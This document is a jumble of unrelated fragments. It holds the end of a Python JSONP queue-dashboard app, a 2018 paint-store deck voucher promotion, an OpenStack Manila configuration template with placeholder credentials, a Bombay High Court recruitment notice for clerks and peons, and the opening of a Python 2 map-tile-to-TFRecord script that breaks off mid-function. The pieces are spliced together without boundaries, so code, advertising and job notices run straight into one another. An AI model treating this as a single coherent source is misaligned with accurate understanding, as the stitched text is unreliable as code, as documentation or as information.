    elif action in ['flush', 'delete', 'peek', 'flush_all', 'reload', 'shutdown']:
        actions = []
        for _sq in server_queue:
            # "server,queue" for per-queue actions; bare "server" otherwise.
            (server, queue) = _sq.split(',', 1) if _sq.count(',') else (_sq, None)
            if action in ['flush', 'delete', 'peek']:
                actions.append((server, [queue]))
            else:
                actions.append((server, []))
        data['results'] = kestrel_actions.action(action, actions)
    else:
        data['error'] = 'Invalid action'
        status = 500

    return dream.JSONResponse(callback=callback, body=data, status=status)


@App.expose('/ajax/stats.json')
def ajax_stats(request):
    '''Return per-server and per-queue stats, optionally filtered and sorted.'''
    callback = request.params['callback'] if 'callback' in request.params else None
    servers = request.params['servers'] if 'servers' in request.params else None
    qsort = request.params['qsort'] if 'qsort' in request.params else None
    qreverse = int(request.params['qreverse']) if 'qreverse' in request.params else 0
    qfilter = request.params['qfilter'] if 'qfilter' in request.params else None

    response = {}
    if servers:
        server_stats = dict([(server, None) for server in servers.split(',')])
        queue_stats = []

        stats_response = kestrel_actions.stats(server_stats.iterkeys())
        if stats_response is not None:
            for server, _data in stats_response.iteritems():
                server_stats[server] = _data['server']
                queue_stats.extend([
                    dict(server=server, queue=queue, **qstats)
                    for queue, qstats in _data['queues'].iteritems()
                    if util.queue_filter(qfilter, queue, qstats)
                ])

        response['servers'] = [
            {'server': server, 'stats': _stats}
            for server, _stats in server_stats.iteritems()
        ]
        response['servers'].sort(key=util.QUEUE_SORT['server'])

        response['queues'] = queue_stats
        # Two stable sorts: order by server first, then by the requested key,
        # so equal-key queues stay grouped by server.
        response['queues'].sort(key=util.QUEUE_SORT['server'])
        response['queues'].sort(
            key=util.QUEUE_SORT[qsort] if qsort in util.QUEUE_SORT else util.QUEUE_SORT['name'],
            reverse=qreverse)

    return dream.JSONResponse(callback=callback, body=response)


@App.expose('/ajax/config.json')
def templates(request):
    '''Return the configured server list and the client-side HTML templates.'''
    callback = request.params['callback'] if 'callback' in request.params else None
    return dream.JSONResponse(callback=callback, body={
        'servers': [{'server': server} for server in local_settings.servers],
        'templates': {
            'content': util.template('content.html'),
            'servers': util.template('servers.html'),
            'queues': util.template('queues.html'),
        }
    })


@App.expose('/static/<filepath:.*>')
def static(request, filepath):
    '''Serve a static asset with a best-guess content type.'''
    body = ''
    # BUGFIX: default was the typo 'test/plain', an invalid media type.
    content_type = 'text/plain'
    try:
        body = util.static(filepath)
        if filepath.endswith('.css'):
            content_type = 'text/css'
        elif filepath.endswith('.js'):
            content_type = 'text/javascript'
        elif filepath.endswith('.html'):
            content_type = 'text/html'
        elif filepath.endswith('.png'):
            content_type = 'image/png'
    except Exception:
        # Best-effort: a missing/unreadable file yields an empty body rather
        # than an error response (was a bare except; narrowed so system exits
        # and interrupts propagate).
        pass
    return dream.Response(body=body, content_type=content_type)
There’s no fail like a BBQ fail and the most epic BBQ fail is an unkept deck. Luckily, Inspirations Paint will help you Unfail Your Deck. Right now, for every $125 spent on deck products (oils, stains, cleaning products & accessories at participating stores) get a $25 voucher for your next project. Hurry, offer ends 24 November 2018 or while voucher stocks last. Click here to find your nearest store. Offer is applicable from 29 October and ends 24 November 2018 or while voucher stocks last. Full Terms & Conditions: Retail customers only. Excludes trade products, trade and account customers. Instantly get 1 x $25 project voucher for every $125 spent on deck products (oils, stains, cleaning products & accessories) in one retail transaction at participating stores. Deck products include: decking oils, decking stains, deck cleaner and deck accessories such as; applicators, poles, socks, buckets, brushes and pads. The $125 qualifying amount is after Paint Club discount is applied, if the customer is a member of Inspirations Paint’s loyalty program, Paint Club. Otherwise the $125 qualifier is at RRP. Vouchers expire 28 February 2019. Voucher is for the customers’ “next project” and cannot be redeemed on the same purchase that earned the voucher. Vouchers are not redeemable for cash and must be used in one transaction with no change given for unspent funds. The $25 voucher is valid for redemption on any products at a retail price point (RRP or Paint Club). Vouchers can only be used once and must be surrendered to store staff at time of payment.
conf_manila_conf = """[DEFAULT] default_share_type = default_share_type rootwrap_config = /etc/manila/rootwrap.conf auth_strategy = keystone my_ip = {{ my_ip }} # # From oslo.messaging # # Size of RPC connection pool. (integer value) # Deprecated group/name - [DEFAULT]/rpc_conn_pool_size #rpc_conn_pool_size = 30 # ZeroMQ bind address. Should be a wildcard (*), an ethernet # interface, or IP. The "host" option should point or resolve to this # address. (string value) #rpc_zmq_bind_address = * # MatchMaker driver. (string value) # Allowed values: redis, dummy #rpc_zmq_matchmaker = redis # Type of concurrency used. Either "native" or "eventlet" (string # value) #rpc_zmq_concurrency = eventlet # Number of ZeroMQ contexts, defaults to 1. (integer value) #rpc_zmq_contexts = 1 # Maximum number of ingress messages to locally buffer per topic. # Default is unlimited. (integer value) #rpc_zmq_topic_backlog = <None> # Directory for holding IPC sockets. (string value) #rpc_zmq_ipc_dir = /var/run/openstack # Name of this node. Must be a valid hostname, FQDN, or IP address. # Must match "host" option, if running Nova. (string value) #rpc_zmq_host = localhost # Seconds to wait before a cast expires (TTL). The default value of -1 # specifies an infinite linger period. The value of 0 specifies no # linger period. Pending messages shall be discarded immediately when # the socket is closed. Only supported by impl_zmq. (integer value) #rpc_cast_timeout = -1 # The default number of seconds that poll should wait. Poll raises # timeout exception when timeout expired. (integer value) #rpc_poll_timeout = 1 # Expiration timeout in seconds of a name service record about # existing target ( < 0 means no timeout). (integer value) #zmq_target_expire = 120 # Use PUB/SUB pattern for fanout methods. PUB/SUB always uses proxy. # (boolean value) #use_pub_sub = true # Minimal port number for random ports range. 
(port value) # Minimum value: 0 # Maximum value: 65535 #rpc_zmq_min_port = 49152 # Maximal port number for random ports range. (integer value) # Minimum value: 1 # Maximum value: 65536 #rpc_zmq_max_port = 65536 # Number of retries to find free port number before fail with # ZMQBindError. (integer value) #rpc_zmq_bind_port_retries = 100 # Size of executor thread pool. (integer value) # Deprecated group/name - [DEFAULT]/rpc_thread_pool_size #executor_thread_pool_size = 64 # Seconds to wait for a response from a call. (integer value) #rpc_response_timeout = 60 # A URL representing the messaging driver to use and its full # configuration. If not set, we fall back to the rpc_backend option # and driver specific configuration. (string value) #transport_url = <None> # The messaging driver to use, defaults to rabbit. Other drivers # include amqp and zmq. (string value) rpc_backend = rabbit # The default exchange under which topics are scoped. May be # overridden by an exchange name specified in the transport_url # option. (string value) #control_exchange = openstack [cors] # # From oslo.middleware.cors # # Indicate whether this resource may be shared with the domain # received in the requests "origin" header. (list value) #allowed_origin = <None> # Indicate that the actual request can include user credentials # (boolean value) #allow_credentials = true # Indicate which headers are safe to expose to the API. Defaults to # HTTP Simple Headers. (list value) #expose_headers = Content-Type,Cache-Control,Content-Language,Expires,Last-Modified,Pragma # Maximum cache age of CORS preflight requests. (integer value) #max_age = 3600 # Indicate which methods can be used during the actual request. (list # value) #allow_methods = GET,POST,PUT,DELETE,OPTIONS # Indicate which header field names may be used during the actual # request. 
(list value) #allow_headers = Content-Type,Cache-Control,Content-Language,Expires,Last-Modified,Pragma [cors.subdomain] # # From oslo.middleware.cors # # Indicate whether this resource may be shared with the domain # received in the requests "origin" header. (list value) #allowed_origin = <None> # Indicate that the actual request can include user credentials # (boolean value) #allow_credentials = true # Indicate which headers are safe to expose to the API. Defaults to # HTTP Simple Headers. (list value) #expose_headers = Content-Type,Cache-Control,Content-Language,Expires,Last-Modified,Pragma # Maximum cache age of CORS preflight requests. (integer value) #max_age = 3600 # Indicate which methods can be used during the actual request. (list # value) #allow_methods = GET,POST,PUT,DELETE,OPTIONS # Indicate which header field names may be used during the actual # request. (list value) #allow_headers = Content-Type,Cache-Control,Content-Language,Expires,Last-Modified,Pragma [database] # # From oslo.db # # The file name to use with SQLite. (string value) # Deprecated group/name - [DEFAULT]/sqlite_db #sqlite_db = oslo.sqlite # If True, SQLite uses synchronous mode. (boolean value) # Deprecated group/name - [DEFAULT]/sqlite_synchronous #sqlite_synchronous = true # The back end to use for the database. (string value) # Deprecated group/name - [DEFAULT]/db_backend #backend = sqlalchemy # The SQLAlchemy connection string to use to connect to the database. # (string value) # Deprecated group/name - [DEFAULT]/sql_connection # Deprecated group/name - [DATABASE]/sql_connection # Deprecated group/name - [sql]/connection connection = {{ connection }} # The SQLAlchemy connection string to use to connect to the slave # database. (string value) #slave_connection = <None> # The SQL mode to be used for MySQL sessions. This option, including # the default, overrides any server-set SQL mode. To use whatever SQL # mode is set by the server configuration, set this to no value. 
# Example: mysql_sql_mode= (string value) #mysql_sql_mode = TRADITIONAL # Timeout before idle SQL connections are reaped. (integer value) # Deprecated group/name - [DEFAULT]/sql_idle_timeout # Deprecated group/name - [DATABASE]/sql_idle_timeout # Deprecated group/name - [sql]/idle_timeout #idle_timeout = 3600 # Minimum number of SQL connections to keep open in a pool. (integer # value) # Deprecated group/name - [DEFAULT]/sql_min_pool_size # Deprecated group/name - [DATABASE]/sql_min_pool_size #min_pool_size = 1 # Maximum number of SQL connections to keep open in a pool. (integer # value) # Deprecated group/name - [DEFAULT]/sql_max_pool_size # Deprecated group/name - [DATABASE]/sql_max_pool_size #max_pool_size = <None> # Maximum number of database connection retries during startup. Set to # -1 to specify an infinite retry count. (integer value) # Deprecated group/name - [DEFAULT]/sql_max_retries # Deprecated group/name - [DATABASE]/sql_max_retries #max_retries = 10 # Interval between retries of opening a SQL connection. (integer # value) # Deprecated group/name - [DEFAULT]/sql_retry_interval # Deprecated group/name - [DATABASE]/reconnect_interval #retry_interval = 10 # If set, use this value for max_overflow with SQLAlchemy. (integer # value) # Deprecated group/name - [DEFAULT]/sql_max_overflow # Deprecated group/name - [DATABASE]/sqlalchemy_max_overflow #max_overflow = 50 # Verbosity of SQL debugging information: 0=None, 100=Everything. # (integer value) # Deprecated group/name - [DEFAULT]/sql_connection_debug #connection_debug = 0 # Add Python stack traces to SQL as comment strings. (boolean value) # Deprecated group/name - [DEFAULT]/sql_connection_trace #connection_trace = false # If set, use this value for pool_timeout with SQLAlchemy. (integer # value) # Deprecated group/name - [DATABASE]/sqlalchemy_pool_timeout #pool_timeout = <None> # Enable the experimental use of database reconnect on connection # lost. 
(boolean value) #use_db_reconnect = false # Seconds between retries of a database transaction. (integer value) #db_retry_interval = 1 # If True, increases the interval between retries of a database # operation up to db_max_retry_interval. (boolean value) #db_inc_retry_interval = true # If db_inc_retry_interval is set, the maximum seconds between retries # of a database operation. (integer value) #db_max_retry_interval = 10 # Maximum retries in case of connection error or deadlock error before # error is raised. Set to -1 to specify an infinite retry count. # (integer value) #db_max_retries = 20 # # From oslo.db.concurrency # # Enable the experimental use of thread pooling for all DB API calls # (boolean value) # Deprecated group/name - [DEFAULT]/dbapi_use_tpool #use_tpool = false [keystone_authtoken] # # From keystonemiddleware.auth_token # # Complete public Identity API endpoint. (string value) auth_uri = {{ auth_uri }} auth_url = {{ auth_url }} # API version of the admin Identity API endpoint. (string value) #auth_version = <None> # Do not handle authorization requests within the middleware, but # delegate the authorization decision to downstream WSGI components. # (boolean value) #delay_auth_decision = false # Request timeout value for communicating with Identity API server. # (integer value) #http_connect_timeout = <None> # How many times are we trying to reconnect when communicating with # Identity API Server. (integer value) #http_request_max_retries = 3 # Env key for the swift cache. (string value) #cache = <None> # Required if identity server requires client certificate (string # value) #certfile = <None> # Required if identity server requires client certificate (string # value) #keyfile = <None> # A PEM encoded Certificate Authority to use when verifying HTTPs # connections. Defaults to system CAs. (string value) #cafile = <None> # Verify HTTPS connections. (boolean value) #insecure = false # The region in which the identity server can be found. 
(string value) #region_name = <None> # Directory used to cache files related to PKI tokens. (string value) #signing_dir = <None> # Optionally specify a list of memcached server(s) to use for caching. # If left undefined, tokens will instead be cached in-process. (list # value) # Deprecated group/name - [DEFAULT]/memcache_servers memcached_servers = {{ memcached_servers }} # In order to prevent excessive effort spent validating tokens, the # middleware caches previously-seen tokens for a configurable duration # (in seconds). Set to -1 to disable caching completely. (integer # value) #token_cache_time = 300 # Determines the frequency at which the list of revoked tokens is # retrieved from the Identity service (in seconds). A high number of # revocation events combined with a low cache duration may # significantly reduce performance. (integer value) #revocation_cache_time = 10 # (Optional) If defined, indicate whether token data should be # authenticated or authenticated and encrypted. If MAC, token data is # authenticated (with HMAC) in the cache. If ENCRYPT, token data is # encrypted and authenticated in the cache. If the value is not one of # these options or empty, auth_token will raise an exception on # initialization. (string value) # Allowed values: None, MAC, ENCRYPT #memcache_security_strategy = None # (Optional, mandatory if memcache_security_strategy is defined) This # string is used for key derivation. (string value) #memcache_secret_key = <None> # (Optional) Number of seconds memcached server is considered dead # before it is tried again. (integer value) #memcache_pool_dead_retry = 300 # (Optional) Maximum total number of open connections to every # memcached server. (integer value) #memcache_pool_maxsize = 10 # (Optional) Socket timeout in seconds for communicating with a # memcached server. (integer value) #memcache_pool_socket_timeout = 3 # (Optional) Number of seconds a connection to memcached is held # unused in the pool before it is closed. 
(integer value) #memcache_pool_unused_timeout = 60 # (Optional) Number of seconds that an operation will wait to get a # memcached client connection from the pool. (integer value) #memcache_pool_conn_get_timeout = 10 # (Optional) Use the advanced (eventlet safe) memcached client pool. # The advanced pool will only work under python 2.x. (boolean value) #memcache_use_advanced_pool = false # (Optional) Indicate whether to set the X-Service-Catalog header. If # False, middleware will not ask for service catalog on token # validation and will not set the X-Service-Catalog header. (boolean # value) #include_service_catalog = true # Used to control the use and type of token binding. Can be set to: # "disabled" to not check token binding. "permissive" (default) to # validate binding information if the bind type is of a form known to # the server and ignore it if not. "strict" like "permissive" but if # the bind type is unknown the token will be rejected. "required" any # form of token binding is needed to be allowed. Finally the name of a # binding method that must be present in tokens. (string value) #enforce_token_bind = permissive # If true, the revocation list will be checked for cached tokens. This # requires that PKI tokens are configured on the identity server. # (boolean value) #check_revocations_for_cached = false # Hash algorithms to use for hashing PKI tokens. This may be a single # algorithm or multiple. The algorithms are those supported by Python # standard hashlib.new(). The hashes will be tried in the order given, # so put the preferred one first for performance. The result of the # first hash will be stored in the cache. This will typically be set # to multiple values only while migrating from a less secure algorithm # to a more secure one. Once all the old tokens are expired this # option should be set to a single value for better performance. (list # value) #hash_algorithms = md5 # Prefix to prepend at the beginning of the path. 
Deprecated, use # identity_uri. (string value) #auth_admin_prefix = # Host providing the admin Identity API endpoint. Deprecated, use # identity_uri. (string value) #auth_host = 127.0.0.1 # Port of the admin Identity API endpoint. Deprecated, use # identity_uri. (integer value) #auth_port = 35357 # Protocol of the admin Identity API endpoint. Deprecated, use # identity_uri. (string value) # Allowed values: http, https #auth_protocol = https # Complete admin Identity API endpoint. This should specify the # unversioned root endpoint e.g. https://localhost:35357/ (string # value) #identity_uri = <None> # This option is deprecated and may be removed in a future release. # Single shared secret with the Keystone configuration used for # bootstrapping a Keystone installation, or otherwise bypassing the # normal authentication process. This option should not be used, use # `admin_user` and `admin_password` instead. (string value) #admin_token = <None> # Service username. (string value) #admin_user = <None> # Service user password. (string value) #admin_password = <None> # Service tenant name. (string value) #admin_tenant_name = admin # Authentication type to load (unknown value) # Deprecated group/name - [DEFAULT]/auth_plugin auth_type = password # Config Section from which to load plugin specific options (unknown # value) #auth_section = <None> project_domain_name = default user_domain_name = default project_name = service username = manila password = {{ manila_pass }} [matchmaker_redis] # # From oslo.messaging # # Host to locate redis. (string value) #host = 127.0.0.1 # Use this port to connect to redis host. (port value) # Minimum value: 0 # Maximum value: 65535 #port = 6379 # Password for Redis server (optional). (string value) #password = # List of Redis Sentinel hosts (fault tolerance mode) e.g. # [host:port, host1:port ... ] (list value) #sentinel_hosts = # Redis replica set name. 
(string value) #sentinel_group_name = oslo-messaging-zeromq # Time in ms to wait between connection attempts. (integer value) #wait_timeout = 500 # Time in ms to wait before the transaction is killed. (integer value) #check_timeout = 20000 # Timeout in ms on blocking socket operations (integer value) #socket_timeout = 1000 [oslo_messaging_amqp] # # From oslo.messaging # # address prefix used when sending to a specific server (string value) # Deprecated group/name - [amqp1]/server_request_prefix #server_request_prefix = exclusive # address prefix used when broadcasting to all servers (string value) # Deprecated group/name - [amqp1]/broadcast_prefix #broadcast_prefix = broadcast # address prefix when sending to any server in group (string value) # Deprecated group/name - [amqp1]/group_request_prefix #group_request_prefix = unicast # Name for the AMQP container (string value) # Deprecated group/name - [amqp1]/container_name #container_name = <None> # Timeout for inactive connections (in seconds) (integer value) # Deprecated group/name - [amqp1]/idle_timeout #idle_timeout = 0 # Debug: dump AMQP frames to stdout (boolean value) # Deprecated group/name - [amqp1]/trace #trace = false # CA certificate PEM file to verify server certificate (string value) # Deprecated group/name - [amqp1]/ssl_ca_file #ssl_ca_file = # Identifying certificate PEM file to present to clients (string # value) # Deprecated group/name - [amqp1]/ssl_cert_file #ssl_cert_file = # Private key PEM file used to sign cert_file certificate (string # value) # Deprecated group/name - [amqp1]/ssl_key_file #ssl_key_file = # Password for decrypting ssl_key_file (if encrypted) (string value) # Deprecated group/name - [amqp1]/ssl_key_password #ssl_key_password = <None> # Accept clients using either SSL or plain TCP (boolean value) # Deprecated group/name - [amqp1]/allow_insecure_clients #allow_insecure_clients = false # Space separated list of acceptable SASL mechanisms (string value) # Deprecated group/name - 
[amqp1]/sasl_mechanisms #sasl_mechanisms = # Path to directory that contains the SASL configuration (string # value) # Deprecated group/name - [amqp1]/sasl_config_dir #sasl_config_dir = # Name of configuration file (without .conf suffix) (string value) # Deprecated group/name - [amqp1]/sasl_config_name #sasl_config_name = # User name for message broker authentication (string value) # Deprecated group/name - [amqp1]/username #username = # Password for message broker authentication (string value) # Deprecated group/name - [amqp1]/password #password = [oslo_messaging_notifications] # # From oslo.messaging # # The Drivers(s) to handle sending notifications. Possible values are # messaging, messagingv2, routing, log, test, noop (multi valued) # Deprecated group/name - [DEFAULT]/notification_driver #driver = # A URL representing the messaging driver to use for notifications. If # not set, we fall back to the same configuration used for RPC. # (string value) # Deprecated group/name - [DEFAULT]/notification_transport_url #transport_url = <None> # AMQP topic used for OpenStack notifications. (list value) # Deprecated group/name - [rpc_notifier2]/topics # Deprecated group/name - [DEFAULT]/notification_topics #topics = notifications [oslo_messaging_rabbit] # # From oslo.messaging # # Use durable queues in AMQP. (boolean value) # Deprecated group/name - [DEFAULT]/amqp_durable_queues # Deprecated group/name - [DEFAULT]/rabbit_durable_queues #amqp_durable_queues = false # Auto-delete queues in AMQP. (boolean value) # Deprecated group/name - [DEFAULT]/amqp_auto_delete #amqp_auto_delete = false # SSL version to use (valid only if SSL enabled). Valid values are # TLSv1 and SSLv23. SSLv2, SSLv3, TLSv1_1, and TLSv1_2 may be # available on some distributions. (string value) # Deprecated group/name - [DEFAULT]/kombu_ssl_version #kombu_ssl_version = # SSL key file (valid only if SSL enabled). 
(string value) # Deprecated group/name - [DEFAULT]/kombu_ssl_keyfile #kombu_ssl_keyfile = # SSL cert file (valid only if SSL enabled). (string value) # Deprecated group/name - [DEFAULT]/kombu_ssl_certfile #kombu_ssl_certfile = # SSL certification authority file (valid only if SSL enabled). # (string value) # Deprecated group/name - [DEFAULT]/kombu_ssl_ca_certs #kombu_ssl_ca_certs = # How long to wait before reconnecting in response to an AMQP consumer # cancel notification. (floating point value) # Deprecated group/name - [DEFAULT]/kombu_reconnect_delay #kombu_reconnect_delay = 1.0 # EXPERIMENTAL: Possible values are: gzip, bz2. If not set compression # will not be used. This option may notbe available in future # versions. (string value) #kombu_compression = <None> # How long to wait a missing client beforce abandoning to send it its # replies. This value should not be longer than rpc_response_timeout. # (integer value) # Deprecated group/name - [DEFAULT]/kombu_reconnect_timeout #kombu_missing_consumer_retry_timeout = 60 # Determines how the next RabbitMQ node is chosen in case the one we # are currently connected to becomes unavailable. Takes effect only if # more than one RabbitMQ node is provided in config. (string value) # Allowed values: round-robin, shuffle #kombu_failover_strategy = round-robin # The RabbitMQ broker address where a single node is used. (string # value) # Deprecated group/name - [DEFAULT]/rabbit_host #rabbit_host = localhost # The RabbitMQ broker port where a single node is used. (port value) # Minimum value: 0 # Maximum value: 65535 # Deprecated group/name - [DEFAULT]/rabbit_port #rabbit_port = 5672 # RabbitMQ HA cluster host:port pairs. (list value) # Deprecated group/name - [DEFAULT]/rabbit_hosts #rabbit_hosts = $rabbit_host:$rabbit_port rabbit_hosts = {{ rabbit_hosts }} # Connect over SSL for RabbitMQ. (boolean value) # Deprecated group/name - [DEFAULT]/rabbit_use_ssl #rabbit_use_ssl = false # The RabbitMQ userid. 
(string value) # Deprecated group/name - [DEFAULT]/rabbit_userid rabbit_userid = {{ rabbit_userid }} # The RabbitMQ password. (string value) # Deprecated group/name - [DEFAULT]/rabbit_password rabbit_password = {{ rabbit_password }} # The RabbitMQ login method. (string value) # Deprecated group/name - [DEFAULT]/rabbit_login_method #rabbit_login_method = AMQPLAIN # The RabbitMQ virtual host. (string value) # Deprecated group/name - [DEFAULT]/rabbit_virtual_host #rabbit_virtual_host = / # How frequently to retry connecting with RabbitMQ. (integer value) #rabbit_retry_interval = 1 # How long to backoff for between retries when connecting to RabbitMQ. # (integer value) # Deprecated group/name - [DEFAULT]/rabbit_retry_backoff #rabbit_retry_backoff = 2 # Maximum interval of RabbitMQ connection retries. Default is 30 # seconds. (integer value) #rabbit_interval_max = 30 # Maximum number of RabbitMQ connection retries. Default is 0 # (infinite retry count). (integer value) # Deprecated group/name - [DEFAULT]/rabbit_max_retries #rabbit_max_retries = 0 # Try to use HA queues in RabbitMQ (x-ha-policy: all). If you change # this option, you must wipe the RabbitMQ database. In RabbitMQ 3.0, # queue mirroring is no longer controlled by the x-ha-policy argument # when declaring a queue. If you just want to make sure that all # queues (except those with auto-generated names) are mirrored across # all nodes, run: "rabbitmqctl set_policy HA '^(?!amq\.).*' '{"ha- # mode": "all"}' " (boolean value) # Deprecated group/name - [DEFAULT]/rabbit_ha_queues #rabbit_ha_queues = false # Positive integer representing duration in seconds for queue TTL # (x-expires). Queues which are unused for the duration of the TTL are # automatically deleted. The parameter affects only reply and fanout # queues. (integer value) # Minimum value: 1 #rabbit_transient_queues_ttl = 1800 # Specifies the number of messages to prefetch. Setting to zero allows # unlimited messages. 
(integer value) #rabbit_qos_prefetch_count = 0 # Number of seconds after which the Rabbit broker is considered down # if heartbeat's keep-alive fails (0 disable the heartbeat). # EXPERIMENTAL (integer value) #heartbeat_timeout_threshold = 60 # How often times during the heartbeat_timeout_threshold we check the # heartbeat. (integer value) #heartbeat_rate = 2 # Deprecated, use rpc_backend=kombu+memory or rpc_backend=fake # (boolean value) # Deprecated group/name - [DEFAULT]/fake_rabbit #fake_rabbit = false # Maximum number of channels to allow (integer value) #channel_max = <None> # The maximum byte size for an AMQP frame (integer value) #frame_max = <None> # How often to send heartbeats for consumer's connections (integer # value) #heartbeat_interval = 1 # Enable SSL (boolean value) #ssl = <None> # Arguments passed to ssl.wrap_socket (dict value) #ssl_options = <None> # Set socket timeout in seconds for connection's socket (floating # point value) #socket_timeout = 0.25 # Set TCP_USER_TIMEOUT in seconds for connection's socket (floating # point value) #tcp_user_timeout = 0.25 # Set delay for reconnection to some host which has connection error # (floating point value) #host_connection_reconnect_delay = 0.25 # Maximum number of connections to keep queued. (integer value) #pool_max_size = 10 # Maximum number of connections to create above `pool_max_size`. # (integer value) #pool_max_overflow = 0 # Default number of seconds to wait for a connections to available # (integer value) #pool_timeout = 30 # Lifetime of a connection (since creation) in seconds or None for no # recycling. Expired connections are closed on acquire. (integer # value) #pool_recycle = 600 # Threshold at which inactive (since release) connections are # considered stale in seconds or None for no staleness. Stale # connections are closed on acquire. (integer value) #pool_stale = 60 # Persist notification messages. 
(boolean value) #notification_persistence = false # Exchange name for for sending notifications (string value) #default_notification_exchange = ${control_exchange}_notification # Max number of not acknowledged message which RabbitMQ can send to # notification listener. (integer value) #notification_listener_prefetch_count = 100 # Reconnecting retry count in case of connectivity problem during # sending notification, -1 means infinite retry. (integer value) #default_notification_retry_attempts = -1 # Reconnecting retry delay in case of connectivity problem during # sending notification message (floating point value) #notification_retry_delay = 0.25 # Time to live for rpc queues without consumers in seconds. (integer # value) #rpc_queue_expiration = 60 # Exchange name for sending RPC messages (string value) #default_rpc_exchange = ${control_exchange}_rpc # Exchange name for receiving RPC replies (string value) #rpc_reply_exchange = ${control_exchange}_rpc_reply # Max number of not acknowledged message which RabbitMQ can send to # rpc listener. (integer value) #rpc_listener_prefetch_count = 100 # Max number of not acknowledged message which RabbitMQ can send to # rpc reply listener. (integer value) #rpc_reply_listener_prefetch_count = 100 # Reconnecting retry count in case of connectivity problem during # sending reply. -1 means infinite retry during rpc_timeout (integer # value) #rpc_reply_retry_attempts = -1 # Reconnecting retry delay in case of connectivity problem during # sending reply. (floating point value) #rpc_reply_retry_delay = 0.25 # Reconnecting retry count in case of connectivity problem during # sending RPC message, -1 means infinite retry. 
If actual retry # attempts in not 0 the rpc request could be processed more then one # time (integer value) #default_rpc_retry_attempts = -1 # Reconnecting retry delay in case of connectivity problem during # sending RPC message (floating point value) #rpc_retry_delay = 0.25 [oslo_concurrency] lock_path = /var/lib/manila/tmp """
The Bombay High Court has released a notification for the recruitment of Stenographer (L.G.), Junior Clerk and Peon/Hamal. Applications are invited against 8921 vacancies. The Bombay High Court is located in Mumbai, Maharashtra and its jurisdiction covers Maharashtra, Goa, Dadra & Nagar Haveli, Daman & Diu. Stenographer (L.G.) The applicant should have passed the High School Examination. Preference will be given to Graduates and Law Graduates from a recognised University. The applicant should have passed an English typing Test at min. 40 w.p.m, a Marathi Typing Test at min. 30 w.p.m, an English Shorthand Speed of 100 w.p.m. and a Marathi Shorthand Speed of 80 w.p.m. The applicant must have a Computer Education Certificate from a recognised Institute/Center. The age of the applicant should be between 18-38 years. Applicants belonging to the reserved categories shall be eligible for age relaxation. Junior Clerk The applicant should have passed the High School Examination. Preference will be given to Graduates and Law Graduates from a recognised University. The applicant should have passed an English typing Test at min. 40 w.p.m and a Marathi Typing Test at min. 30 w.p.m. Peon/Hamal The applicant should have passed the 7th class examination from a recognised Board. The applicant can fill in the Application Form ‘free of cost’. There is no Application Fee to apply for the post of Stenographer (L.G.), Junior Clerk and Peon/Hamal.
# -*- coding: utf-8 -*-
"""Build image-to-image training data from slippy-map tiles.

For every tile coordinate in the requested x/y range, fetches one "target"
tile and one or more "input" tiles (from HTTP tile servers, WMS endpoints,
or a local tile directory), writes each input/target pair to a .tfrecords
file, and pastes every fetched tile into whole-area preview PNGs.

NOTE(review): this is Python 2 code (print statements, cStringIO,
Python 2 json.loads() encoding argument).
"""
import scipy.io
from PIL import Image
import numpy as np
import random
import scipy.ndimage
from skimage.transform import rotate
import os
import argparse
import requests
from cStringIO import StringIO
import glob
import math
import tensorflow as tf
import json

# Positional args give the inclusive tile-index ranges and the zoom level.
parser = argparse.ArgumentParser(description='MyScript')
parser.add_argument('images_x_start', type=int)
parser.add_argument('images_x_end', type=int)
parser.add_argument('images_y_start', type=int)
parser.add_argument('images_y_end', type=int)
parser.add_argument('zoom_level', type=int)
parser.add_argument('--inputJson', default="./jsonSample.txt")  # tile-source config (JSON)
parser.add_argument('--outputPath', default="Data")  # directory for .tfrecords output
args = parser.parse_args()

# Edge length in pixels of one map tile.
TILE_SIZE = 256

#jsonFile = open(args.inputJson)
#json_dict = json.load(jsonFile)
with open(args.inputJson, 'r') as json_fp:
    # Second positional argument is Python 2 json.loads()'s 'encoding'.
    json_dict = json.loads(json_fp.read(),'utf-8')

print (str(json_dict))

INPUT_URL = json_dict['inputURL']    # list of input tile-source descriptors
TARGET_URL = json_dict['targetURL']  # target tile-source descriptor (may be null)
OUTPUT_PATH = os.path.join(os.getcwd(),args.outputPath)

if not os.path.isdir(OUTPUT_PATH):
    os.makedirs(OUTPUT_PATH)

def _bytes_feature(value):
    # Wrap a raw byte string as a TFRecord bytes feature.
    return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))

def _int64_feature(value):
    # Wrap an integer as a TFRecord int64 feature.
    return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))

# Size (in tiles) of the square neighbourhood written per record; fixed to 1
# here, so every record covers exactly one tile.
#kernel_size = args.kernelSize
kernel_size = 1
input_img_num = len(INPUT_URL)

# Pixel dimensions of the whole-area preview canvases (the requested tile
# range, widened by the kernel neighbourhood; with kernel_size == 1 the
# padding terms cancel out).
image_size_x = TILE_SIZE * ((args.images_x_end - int(kernel_size / 2) + kernel_size - 1) - (args.images_x_start - int(kernel_size / 2)) + 1)
image_size_y = TILE_SIZE * ((args.images_y_end - int(kernel_size / 2) + kernel_size - 1) - (args.images_y_start - int(kernel_size / 2)) + 1)

# Transparent canvases that the fetched tiles get pasted onto.
input_img = []
for i in range(input_img_num):
    input_img.append(Image.new('RGBA', (image_size_x, image_size_y), (0, 0, 0, 0)))
target_img = Image.new('RGBA', (image_size_x, image_size_y), (0, 0, 0, 0))

#imgs_num = 1

def tile2latlon(x, y, z):
    """Return [lon, lat] of the corner of slippy-map tile (x, y) at zoom z."""
    lon = (x / 2.0**z) * 360 - 180  # longitude (degrees east)
    mapy = (y / 2.0**z) * 2 * math.pi - math.pi
    lat = 2 * math.atan(math.e ** (- mapy)) * 180 / math.pi - 90  # latitude (degrees north)
    return [lon,lat]

def demtofloat(n):
    # Convert a DEM text value to float; 'e' (presumably a no-data marker --
    # TODO confirm) maps to 0.  NOTE(review): not called anywhere in this
    # script.
    if n == 'e':
        return 0
    else:
        return float(n)

def getTile(req_target, i, j, zoom_level):
    """Fetch tile (i, j) at zoom_level from the source described by req_target.

    req_target['type'] selects the source kind:
      * 'localTile' -- read a file under req_target['path'];
      * 'tile'      -- HTTP GET from a {z}/{x}/{y}-style URL template;
      * 'wms'       -- HTTP GET from a WMS bounding-box URL template.

    Returns (image, error_flg); error_flg is 1 on any failure, in which
    case the image is a blank transparent tile.
    """
    input_img_p = Image.new('RGBA', (TILE_SIZE, TILE_SIZE), (0, 0, 0, 0))
    error_flg = 0
    if req_target['type'] == 'localTile':
        # Substitute the tile coordinates into the filename template.
        path_format = req_target['format']
